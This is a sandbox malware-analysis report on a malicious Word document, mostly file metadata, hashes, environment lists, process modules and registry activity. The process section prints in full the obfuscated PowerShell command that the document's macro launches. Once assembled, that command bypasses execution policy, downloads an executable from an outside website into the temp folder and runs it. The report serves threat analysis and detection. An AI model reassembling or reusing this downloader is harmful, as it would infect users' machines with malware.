General Info

File name

e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e

Full analysis
https://app.any.run/tasks/03008759-02d7-454c-8611-acf7199b1cd8
Verdict
Malicious activity
Analysis date
7/18/2019, 09:25:44
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:

generated-doc

Indicators:

MIME:
application/msword
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Eduard Schuchhardt B.A., Number of Characters: 2331, Create Time/Date: Tue Oct 2 00:48:18 2018, Last Saved Time/Date: Tue Oct 2 00:48:18 2018, Security: 0, Keywords: voluptate, earum, enim, Last Saved By: Eduard Schuchhardt B.A., Revision Number: 181519, Subject: Dokument N892778, Template: Normal, Title: Dokument N892778, Total Editing Time: 02:00, Number of Words: 2331, Number of Pages: 64, Comments: Deserunt dolorem natus quae vel quia.
MD5

b3b1760d2e5525a562f2d7a49c27ed93

SHA1

94be3e9b653ff9c2db2fea0a3ffb5f02e533d77e

SHA256

e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e

SSDEEP

3072:7AxB6T44CDZ803LyyK2CdWWDQKQ4k1aI2CyoPJf9J:7wN4Cl803eyK20WdKQ31vLyoPN9J

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
520 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
on
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 11.0.9600.18860 KB4052978
  • Adobe Acrobat Reader DC MUI (15.007.20033)
  • Adobe Flash Player 27 ActiveX (27.0.0.187)
  • Adobe Flash Player 27 NPAPI (27.0.0.187)
  • Adobe Flash Player 27 PPAPI (27.0.0.187)
  • CCleaner (5.35)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (64-bit) (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Professional 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Single Image 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
  • Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
  • Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 67.0.4 (x64 en-US) (67.0.4)
  • Mozilla Maintenance Service (67.0.4)
  • Notepad++ (64-bit x64) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype™ 7.39 (7.39.102)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (64-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Hyphenation Parent Package English
  • IE Spelling Parent Package English
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • InternetExplorer Package TopLevel
  • KB2479943
  • KB2491683
  • KB2506014
  • KB2506212
  • KB2506928
  • KB2509553
  • KB2532531
  • KB2533552
  • KB2534111
  • KB2545698
  • KB2547666
  • KB2552343
  • KB2560656
  • KB2563227
  • KB2564958
  • KB2579686
  • KB2585542
  • KB2585542 SP1
  • KB2598845
  • KB2603229
  • KB2604115
  • KB2620704
  • KB2621440
  • KB2631813
  • KB2640148
  • KB2653956
  • KB2654428
  • KB2656356
  • KB2656356 SP1
  • KB2660075
  • KB2667402
  • KB2685811
  • KB2685813
  • KB2685939
  • KB2690533
  • KB2698365
  • KB2705219
  • KB2706045
  • KB2719857
  • KB2726535
  • KB2727528
  • KB2729094
  • KB2729452
  • KB2732059
  • KB2732487
  • KB2736422
  • KB2742599
  • KB2750841
  • KB2758857
  • KB2761217
  • KB2763523
  • KB2770660
  • KB2773072
  • KB2786081
  • KB2789645
  • KB2789645 SP1
  • KB2791765
  • KB2799926
  • KB2800095
  • KB2807986
  • KB2808679
  • KB2813430
  • KB2834140
  • KB2836942
  • KB2836943
  • KB2840631
  • KB2843630
  • KB2847927
  • KB2852386
  • KB2853952
  • KB2861698
  • KB2862152
  • KB2862330
  • KB2862335
  • KB2864202
  • KB2868038
  • KB2871997
  • KB2884256
  • KB2888049
  • KB2891804
  • KB2892074
  • KB2893294
  • KB2893519
  • KB2894844
  • KB2900986
  • KB2908783
  • KB2911501
  • KB2912390
  • KB2918077
  • KB2919469
  • KB2931356
  • KB2937610
  • KB2943357
  • KB2952664
  • KB2966583
  • KB2968294
  • KB2970228
  • KB2972100
  • KB2972211
  • KB2973112
  • KB2973201
  • KB2973351
  • KB2977292
  • KB2978120
  • KB2978742
  • KB2984972
  • KB2985461
  • KB2991963
  • KB2992611
  • KB3003743
  • KB3004361
  • KB3004375
  • KB3006121
  • KB3006137
  • KB3010788
  • KB3011780
  • KB3013531
  • KB3019978
  • KB3020370
  • KB3021674
  • KB3021917
  • KB3022777
  • KB3023215
  • KB3030377
  • KB3031432
  • KB3035126
  • KB3035132
  • KB3037574
  • KB3042058
  • KB3045685
  • KB3046017
  • KB3046269
  • KB3054476
  • KB3055642
  • KB3059317
  • KB3060716
  • KB3067903
  • KB3068708
  • KB3071756
  • KB3072305
  • KB3074543
  • KB3075220
  • KB3076895
  • KB3078601
  • KB3078667
  • KB3080149
  • KB3084135
  • KB3086255
  • KB3092601
  • KB3092627
  • KB3093513
  • KB3097989
  • KB3101722
  • KB3107998
  • KB3108371
  • KB3108381
  • KB3108664
  • KB3109103
  • KB3109560
  • KB3110329
  • KB3115858
  • KB3115858 SP1
  • KB3122648
  • KB3124275
  • KB3126587
  • KB3127220
  • KB3133977
  • KB3137061
  • KB3138378
  • KB3138612
  • KB3138910
  • KB3139398
  • KB3139914
  • KB3140245
  • KB3147071
  • KB3150220
  • KB3155178
  • KB3156016
  • KB3156019
  • KB3159398
  • KB3161102
  • KB3161949
  • KB3161958
  • KB3170735
  • KB3170735 SP1
  • KB3172605
  • KB3177467
  • KB3179573
  • KB3184143
  • KB4019990
  • KB4040980
  • KB976902
  • KB982018
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • Package 1 for KB2656356
  • Package 1 for KB2789645
  • Package 1 for KB3115858
  • Package 1 for KB3170735
  • Package 2 for KB2585542
  • Package 2 for KB2656356
  • Package 2 for KB2789645
  • Package 2 for KB3115858
  • Package 2 for KB3170735
  • Package 3 for KB2585542
  • Package 3 for KB2656356
  • Package 4 for KB2656356
  • Package 4 for KB2789645
  • Package 5 for KB2656356
  • Package 7 for KB2656356
  • PlatformUpdate Win7 SRV08R2 Package TopLevel
  • ProfessionalEdition
  • RollupFix
  • UltimateEdition
  • WUClient SelfUpdate ActiveX
  • WUClient SelfUpdate Aux TopLevel
  • WUClient SelfUpdate Core TopLevel

Behavior activities

MALICIOUS SUSPICIOUS INFO
Unusual execution from Microsoft Office
  • WINWORD.EXE (PID: 2372)
Application was dropped or rewritten from another process
  • VvoTw.exe (PID: 1784)
Executable content was dropped or overwritten
  • WINWORD.EXE (PID: 2372)
Reads the machine GUID from the registry
  • VvoTw.exe (PID: 1784)
Creates files in the user directory
  • WINWORD.EXE (PID: 2372)
Reads the machine GUID from the registry
  • WINWORD.EXE (PID: 2372)
Dropped object may contain Bitcoin addresses
  • WINWORD.EXE (PID: 2372)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 2372)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.doc
|   Microsoft Word document (33.9%)
EXIF
FlashPix
CompObjUserTypeLen:
39
CompObjUserType:
Microsoft Office Word 97-2003 Document
Software:
Microsoft Office Word
Author:
Eduard Schuchhardt B.A.
Characters:
2331
CreateDate:
2018:10:01 23:48:18
ModifyDate:
2018:10:01 23:48:18
Security:
None
Keywords:
voluptate, earum, enim
LastModifiedBy:
Eduard Schuchhardt B.A.
RevisionNumber:
181519
Subject:
Dokument N892778
Template:
Normal
Title:
Dokument N892778
TotalEditTime:
2.0 minutes
Words:
2331
Pages:
64
Comments:
Deserunt dolorem natus quae vel quia.
Paragraphs:
191
Bytes:
-2147483648
HiddenSlides:
-2147483648
Lines:
6422
Notes:
-2147483648
Slides:
-2147483648
Company:
Junck Matthäi OHG mbH
Manager:
Hertha Scholtz B.A.
Category:
sunt

Video and screenshots

Processes

Total processes
35
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

+
drop and start start winword.exe vvotw.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2372
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.5123.5000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\microsoft office\office14\gkword.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\local\temp\yzqhly\odqkhnur\vvotw.exe
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_145eb2808b8d6928\gdiplus.dll
c:\program files\microsoft office\office14\msohev.dll
c:\windows\system32\windowscodecs.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll

PID
1784
CMD
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\VvoTw.exe $NUiEp='\ow';$SxAuE='Obj';$uoea='force';$oxeee='($e';$vktvli='.Net.W';$jbigseylw0='y + ';$XMUMZWE4='te -';$XOWTI='pass ';$ieffuo='(1)';$eujnrw5='://ww';$sqjzsjlo='Pol';$toui='om/wp';$iuhki='Fil';$DvwlNy=' Pro';$yzlursyw='Execu';$vhxkqtzjk='+ ''\yz';$aexny='stem';$qkjrow='rt-';$KeOoB='art-';$BxuPiij76=''',$pa';$xelz='nv:t';$cnuosq20='h;Remo';$EYSIU='.Dow';$oaehcu='var';$cwoiead76='hy =';$ielme='Sta';$wola='qhly''';$YUElsi='Proc';$zspsuor='$path=';$euiiorl68='esn';$FFQBUPABR='en/in';$cvykcpzwy='eak;}}';$tdkgbiwo=' Get';$oaxzoto='UForm';$oosdikmy='twent';$gtzcid='%s;';$jyveey='e'');(';$atgmjml11='d){br';$qifhdo='; St';$zkuoap='https';$ywoy='ect Sy';$ycgvtzzj='ypw.ex';$zfgabei41='ebc';$hekuk='lie';$pwuqyi0=';';$BjAtpWpb='$nhb';$OumXqq10='ess $';$uyue1='ge $h';$EOIOEU='te -';$yeokke6='Sleep';$tgszrqz35=' -m ';$dazfse='s; ';$ZvpDZkuu='emes/';$EPUJVH4='11.11';$aukeue='Get-Da';$ycsxtafm=' = ';$ilaeyfv='tem ';$kkothu67='urs';$eufejwy='c/file';$ieaee='nload';$noxqa='e(''';$uewtnqv='f($e';$qrcttykg='tco.c';$zgyghao4='yfifte';$IIoxta='emp+''';$avgqknlogc='ve-I';$jklcieo='rialpe';$EZLui='$nhbh';$kjnjv='temp ';$ozhnqi51='($env:';$kluyxdm61=') -rec';$ucmntu='u -';$UuixWPz='e -';$ortdi=' $hva';$wbarkee40='{ $eu';$iuke='ces';$ukselzjd='-con';$acvasle='th)';$bovzcrf0='at ';$REPUUO='at ';$ycgjbp='pat';$qkmccflw='UForm';$qmroaxh='-Scope';$imcix='[do';$hxedwra='Set-';$muozz='tion';$flourh8=';while';$psae='/th';$xqkiobs='rd = ';$kvzxuue6='nt)';$cxlqiai='uble]';$GaUKeu0='535;i';$YFEegck='w.impe';$yuongdb='.exe';$feywlof='-Da';$bnnpujs='New-';$ogyvr='tent';$uuao8='icy By';$lyuzvkta='%s;'; Invoke-Expression ($imcix+$cxlqiai+$BjAtpWpb+$cwoiead76+$tdkgbiwo+$feywlof+$EOIOEU+$oaxzoto+$bovzcrf0+$lyuzvkta+$ortdi+$xqkiobs+$EZLui+$jbigseylw0+$EPUJVH4+$flourh8+$ieffuo+$wbarkee40+$ycsxtafm+$aukeue+$XMUMZWE4+$qkmccflw+$REPUUO+$gtzcid+$ielme+$qkjrow+$yeokke6+$tgszrqz35+$GaUKeu0+$uewtnqv+$ucmntu+$uyue1+$oaehcu+$atgmjml11+$cvykcpzwy+$hxedwra+$yzlursyw+$muozz+$sqjzsjlo+$uuao8+$XOWTI+$qmroaxh+$DvwlNy+$iuke+$dazfse+$zspsuor+$oxeee+$xelz+$IIoxta+$NUiEp+$euiiorl68+$ycgvtzzj+$jyveey+$bnnpujs+$SxAuE+$ywoy+$aexny+$vktvli+$zfgabei41+$hekuk+$kvzxuue6+$EYSIU+$ieaee+$iuhki+$noxqa+$zkuoap+$eujnrw5+$YFEegck+$jklcieo+$qrcttykg+$toui+$ukselzjd+$ogyvr+$psae+$ZvpDZkuu+$oosdikmy+$zgyghao4+$FFQBUPABR+$eufejwy+$yuongdb+$BxuPiij76+$acvasle+$qifhdo+$KeOoB+$YUElsi+$OumXqq10+$ycgjbp+$cnuosq20+$avgqknlogc+$ilaeyfv+$ozhnqi51+$kjnjv+$vhxkqtzjk+$wola+$kluyxdm61+$kkothu67+$UuixWPz+$uoea+$pwuqyi0);
Path
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\VvoTw.exe
Indicators
No indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\users\admin\appdata\local\temp\yzqhly\odqkhnur\vvotw.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system\9b0615d346556a8ae639dcec168731cc\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\fabca41dc6cc22a902c2525408b49ab9\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management.a#\d5ab9ebdfc2bacea66210c16fff703d2\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.core\2706ddbd765b8a111d3083f8af88ef03\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\326a4488a1881b3bd8ea1e8f4dd7420f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuratio#\1e9190c7a12053ea715c8d8ef8faddd1\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.wsman.man#\23314086651ff4d13264ef3cd19e0b4e\microsoft.wsman.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.transactions\9354030849f9e58d9b95d32149f7bb68\system.transactions.ni.dll
c:\windows\assembly\gac_64\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\2e6ebcf758bbffd55f7abfd8878c72c1\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\7c10a24ff552941b03414d424169041f\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\89738d6a75ab575f400360d0670f60ed\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework64\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.xml\e0542eb82c5f716397d316d5c88f7ae5\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management\38c49b707af17308185a48479fcb7404\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.directoryser#\543de12ce97f16746b85981a80878035\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorjit.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.data\2276c85b65e1f517da1b9026640e2a55\system.data.ni.dll
c:\windows\assembly\gac_64\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll

Registry activity

Total events
975
Read events
876
Write events
98
Delete events
1

Modification events

PID
Process
Operation
Key
Name
Value
2372
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
mh<
6D683C0044090000010000000000000000000000
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
1324482602
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
1324482686
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
1324482687
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
44090000DEF766103A3DD50100000000
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
?m<
3F6D3C004409000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
=p<
3D703C00440900000600000001000000C800000002000000B80000000400000063003A005C00750073006500720073005C00610064006D0069006E005C006400650073006B0074006F0070005C0065003300320039003400300063003500320061006500640033006200370038003700320036003700660034006200380064003500320038006100660039003700310030003800620034003600660035003200350034003500370038006300620061006100620032003000370036003800640039003800660035003800390065002E0064006F006300000000000000
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
1324482564
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{E6B49558-227D-4459-AD8E-A13318608A13}
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D53D3A122BDE40][O00000000]*C:\Users\admin\Desktop\
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D53D3A122E4F40][O00000000]*C:\Users\admin\Desktop\e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc
2372
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\13B5A8
13B5A8
04000000440900005B00000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0065003300320039003400300063003500320061006500640033006200370038003700320036003700660034006200380064003500320038006100660039003700310030003800620034003600660035003200350034003500370038006300620061006100620032003000370036003800640039003800660035003800390065002E0064006F0063004400000065003300320039003400300063003500320061006500640033006200370038003700320036003700660034006200380064003500320038006100660039003700310030003800620034003600660035003200350034003500370038006300620061006100620032003000370036003800640039003800660035003800390065002E0064006F006300000000000100000000000000766E5D103A3DD501A8B51300A8B5130000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000